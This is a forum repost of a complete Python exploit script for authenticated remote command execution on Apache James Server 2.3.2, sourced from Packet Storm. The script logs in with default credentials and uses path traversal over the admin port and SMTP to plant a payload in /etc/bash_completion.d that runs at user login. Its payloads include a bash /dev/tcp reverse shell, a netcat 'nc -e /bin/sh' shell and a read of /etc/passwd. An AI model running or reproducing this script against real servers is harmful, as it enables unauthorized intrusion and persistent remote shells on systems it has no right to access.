Apache James Server 2.3.2 Remote Command Execution

#362
Topic created · 1 Posts · 2 Views
  • Apache James Server version 2.3.2 remote command execution exploit.
    MD5 | 0eb92dd4e52ca8418296c8475a97f2a9
    Download

    # Exploit Title: Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)  
    # Date: 27/09/2021  
    # Exploit Author: shinris3n  
    # Vendor Homepage: http://james.apache.org/server/  
    # Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip  
    # Version: Apache James Server 2.3.2  
    # Tested on: Ubuntu  
    # Info: This exploit works on default installation of Apache James Server 2.3.2  
    # Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d  
    '''  
    This Python 3 implementation is based on the original (Python 2) exploit code developed by   
    Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec.  The following modifications were made:  
    1 - Made required changes to print and socket commands for Python 3 compatibility.  
    1 - Changed the default payload to a basic bash reverse shell script and added a netcat option.  
    2 - Changed the command line syntax to allow user input of remote ip, local ip and listener port to correspond with #2.  
    3 - Added a payload that can be used for testing remote command execution and connectivity.  
    4 - Added payload and listener information output based on payload selection and user input.  
    5 - Added execution output clarifications and additional informational comments throughout the code.  
    @shinris3n  
    https://twitter.com/shinris3n  
    https://shinris3n.github.io/  
    '''  
    #!/usr/bin/python3  
    import socket  
    import sys  
    import time  
    # credentials to James Remote Administration Tool (Default - root/root)  
    user = 'root'  
    pwd = 'root'  
    if len(sys.argv) != 4:  
    sys.stderr.write("[-]Usage: python3 %s <remote ip> <local ip> <local listener port>\n" % sys.argv[0])  
    sys.stderr.write("[-]Example: python3 %s 172.16.1.66 172.16.1.139 443\n" % sys.argv[0])  
    sys.stderr.write("[-]Note: The default payload is a basic bash reverse shell - check script for details and other options.\n")  
    sys.exit(1)  
    remote_ip = sys.argv[1]  
    local_ip = sys.argv[2]  
    port = sys.argv[3]  
    # Select payload prior to running script - default is a reverse shell executed upon any user logging in (i.e. via SSH)  
    payload = '/bin/bash -i >& /dev/tcp/' + local_ip + '/' + port + ' 0>&1' # basic bash reverse shell exploit executes after user login  
    #payload = 'nc -e /bin/sh ' + local_ip + ' ' + port # basic netcat reverse shell  
    #payload = 'echo $USER && cat /etc/passwd && ping -c 4 ' + local_ip # test remote command execution capabilities and connectivity  
    #payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # proof of concept exploit on root user login only  
    print ("[+]Payload Selected (see script for more options): ", payload)  
    if '/bin/bash' in payload:  
    print ("[+]Example netcat listener syntax to use after successful execution: nc -lvnp", port)  
    def recv(s):  
    s.recv(1024)  
    time.sleep(0.2)  
    try:  
    print ("[+]Connecting to James Remote Administration Tool...")  
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
    s.connect((remote_ip,4555)) # Assumes James Remote Administration Tool is running on Port 4555, change if necessary.  
    s.recv(1024)  
    s.send((user + "\n").encode('utf-8'))  
    s.recv(1024)  
    s.send((pwd + "\n").encode('utf-8'))  
    s.recv(1024)  
    print ("[+]Creating user...")  
    s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n".encode('utf-8'))  
    s.recv(1024)  
    s.send("quit\n".encode('utf-8'))  
    s.close()  
    print ("[+]Connecting to James SMTP server...")  
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
    s.connect((remote_ip,25)) # Assumes default SMTP port, change if necessary.  
    s.send("ehlo [[email protected]](/cdn-cgi/l/email-protection)\r\n".encode('utf-8'))  
    recv(s)  
    print ("[+]Sending payload...")  
    s.send("mail from: <'@team.pl>\r\n".encode('utf-8'))  
    recv(s)  
    # also try s.send("rcpt to: <../../../../../../../../etc/[[email protected]](/cdn-cgi/l/email-protection)>\r\n".encode('utf-8')) if the recipient cannot be found  
    s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n".encode('utf-8'))  
    recv(s)  
    s.send("data\r\n".encode('utf-8'))  
    recv(s)  
    s.send("From: [[email protected]](/cdn-cgi/l/email-protection)\r\n".encode('utf-8'))  
    s.send("\r\n".encode('utf-8'))  
    s.send("'\n".encode('utf-8'))  
    s.send((payload + "\n").encode('utf-8'))  
    s.send("\r\n.\r\n".encode('utf-8'))  
    recv(s)  
    s.send("quit\r\n".encode('utf-8'))  
    recv(s)  
    s.close()  
    print ("[+]Done! Payload will be executed once somebody logs in (i.e. via SSH).")  
    if '/bin/bash' in payload:  
    print ("[+]Don't forget to start a listener on port", port, "before logging in!")  
    except:  
    print ("Connection failed.")  
    

    Source: packetstormsecurity.com

Log in to reply